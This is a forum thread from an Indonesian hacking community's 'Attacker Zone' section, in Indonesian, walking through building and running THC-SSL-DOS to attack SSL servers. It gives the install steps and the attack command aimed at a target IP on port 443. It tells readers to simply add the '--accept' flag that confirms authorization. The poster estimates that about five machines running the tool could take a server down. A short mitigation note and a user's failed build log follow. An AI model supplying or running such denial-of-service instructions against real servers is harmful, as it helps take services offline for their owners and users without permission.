+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Stress Testing (https://www.indonesianbacktrack.or.id/forum/forum-183.html)
+--- Thread: SSL DoS by THC (/thread-1015.html)
Setelah jalan-jalan disini, ternyata ada DoS tipe yg ane baru tau yaitu dengan memanfaatkan protokol SSL yang dibuat oleh The Hacker's Choice.
Download aja langsung sourcenya:
Bagi pengguna Unix/Linux disini
Bagi pengguna Windows disini
1. Cara menggunakan di Unix/Linux:
EDITED: (ane baru coba setelah pulang kantor )
ekstrak dulu filenya dengan
Code:
tar xvf thc-ssl-dos-1.4.tar.gz
lalu masuk ke folder /thc-ssl-dos-1.4.tar.gz
lakukan
Code:
./configure
klo ada error
Quote:configure: error: libcrypto not found part of openssl.
berarti harus install libssl-dev
Code:
apt-get install libssl-dev
trus
Code:
make all install
jalaninnya:
Code:
./thc-ssl-dos masuk.in.ip.target 443
klo ada error:
Quote:ERROR:
Please agree by using '--accept' option that the IP is a legitimate target
and that you are fully authorized to perform the test against this target.
ini semacam agreement antara kita dengan pembuat aplikasi, tambahin --accept aja di line diatas
perhatikan yg warna merah diatas, berarti yg ane lakukan sekitar 60-70 koneksi per detik terhadap server, normalnya sebuah server dapat melakukan sampai 300 koneksi SSL
sehingga dapat disimpulkan serangan DoS yang ane lakukan tidak berhasil membuat server down
berarti paling ngga ada 5 komputer dengan tools ini utk menjatuhkan suatu server...cmiiw
2. Cara menggunakan di Windows:
ekstrak aja file thc-ssl-dos-1.4-win-bin.zip pake winrar/winzip/7zip dsb
buka cmd, masuk ke folder hasil ekstrak diatas, lalu:
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)
berarti SSL di server tersebut telah di patch dengan set "Connection soft Limit" dan "Connection hard limit" di "Server"->"Security"->"Per client throttling", di set soft limit to 20 dan hard limit to 30.
Note:
- masukin IP target, klo menggunakan URL ane coba ga bisa
- disini kita hanya bertukar ilmu, penggunaan tools ini merupakan tanggung jawab masing-masing
root@bt:~/thc-ssl-dos-1.4# ./configure
Begining autoconfiguration process for thc-ssl-dos-1.4...
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
checking target system type... i686-pc-linux-gnu
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /bin/mkdir -p
checking for gawk... gawk
checking whether make sets $(MAKE)... yes
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for style of include used by make... GNU
checking dependency style of gcc... gcc3
checking for ranlib... ranlib
checking for an ANSI C-conforming const... yes
checking whether to compile a static binary... no
checking whether to compile with DEBUG flag... no
checking for /dev/urandom... yes
checking for socket in -lsocket... no
checking for gethostbyname in -lnsl... yes
checking for DH_free in -lcrypto... no
configure: error: libcrypto not found part of openssl.
root@bt:~/thc-ssl-dos-1.4# make install
make: *** No rule to make target `install'. Stop.
root@bt:~/thc-ssl-dos-1.4# make all install
make: *** No rule to make target `all'. Stop.
root@bt:~/thc-ssl-dos-1.4# make install all
make: *** No rule to make target `install'. Stop.